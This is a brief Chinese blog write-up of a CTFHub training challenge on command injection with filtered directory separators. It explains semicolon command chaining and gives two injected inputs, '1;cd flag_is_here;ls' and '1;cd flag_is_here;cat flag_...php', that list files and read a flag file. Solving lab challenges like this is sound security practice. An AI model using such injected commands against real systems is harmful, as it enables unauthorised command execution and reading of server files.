RCE9-文件包含/命令注入/过滤目录分隔符(这里直接cd flag的目录;cat flag文件)

一.题目链接:

https://www.ctfhub.com/#/skilltree

二.基础知识

2.1;命令的作用

  1.为了使所有的命令一起执行
  2.和&的区别:其实没啥本质区别,都是一样的同步执行命令,一个在前。一个在后

三.开始解题

1.进入是个登录界面,登不进去,我们先查看源码看看,发现存在use.php文件

2.

1;cd flag_is_here;ls


3.

1;cd flag_is_here;cat flag_22620475221124.php

posted @ 2025-04-19 12:03  sun010  阅读(12)  评论(0)    收藏  举报